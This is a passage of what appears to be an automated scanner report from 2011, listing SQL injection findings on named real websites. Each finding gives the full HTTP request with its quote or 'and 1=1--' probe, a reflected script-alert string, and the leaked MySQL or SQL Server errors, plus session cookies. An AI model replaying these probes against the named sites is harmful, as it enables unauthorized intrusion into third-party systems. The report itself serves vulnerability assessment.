Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.39. http://www.longislanderotic.com/forum [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.longislanderotic.com
Path:   /forum

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /forum?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.longislanderotic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 18:13:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: WWF=SID=b88fzzeb72437c112fee69314ce4df5f; path=/longislanderotic
Set-Cookie: ASPSESSIONIDQSCDACTQ=MNMDDPPBOGEADHEAEFIHMPPH; path=/
Cache-control: private

<br /><strong>Server Error in Forum Application</strong><br />An error has occured while writing to the database.<br />Please contact the forum administrator.<br /><br /><strong>Support Error Code:-</
...[SNIP]...
<br />Microsoft OLE DB Provider for SQL Server<br />
...[SNIP]...

1.40. http://www.millerwelds.com/about/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:38 GMT
Connection: Keep-Alive
Content-Length: 27686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.41. http://www.millerwelds.com/about/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /about/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:58 GMT
Connection: Keep-Alive
Content-Length: 20770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=is
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /about/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:59 GMT
Connection: Keep-Alive
Content-Length: 22492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=is
...[SNIP]...

1.42. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about'/certifications.html HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:30 GMT
Connection: Keep-Alive
Content-Length: 27705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.43. http://www.millerwelds.com/about/certifications.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about/certifications.html' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:32 GMT
Connection: Keep-Alive
Content-Length: 27732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/about/certifications.html''' at line 1)<br>
...[SNIP]...

1.44. http://www.millerwelds.com/about/certifications.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about/certifications.html?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:52 GMT
Connection: Keep-Alive
Content-Length: 14835

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /about/certifications.html?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:53 GMT
Connection: Keep-Alive
Content-Length: 16538

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; ch
...[SNIP]...

1.45. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.1.10.1303147760; __qca=P0-154865017-1303147760079

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:37 GMT
Connection: Keep-Alive
Content-Length: 27688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/favicon.ico''' at line 1)<br>
...[SNIP]...

1.46. http://www.millerwelds.com/financing/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:11 GMT
Connection: Keep-Alive
Content-Length: 13952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/scr' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:13 GMT
Connection: Keep-Alive
Content-Length: 15521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.47. http://www.millerwelds.com/financing/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /financing'/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:35:18 GMT
Connection: Keep-Alive
Content-Length: 27887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?int_source=/products/accessories/international/&int_medium=bannerad&int_content' at line 1)<br>
...[SNIP]...

1.48. http://www.millerwelds.com/financing/ [int_campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_campaign parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_campaign parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:08 GMT
Connection: Keep-Alive
Content-Length: 13992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/?int_source=/products/accessories/international/&int_medium=bannerad' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:09 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
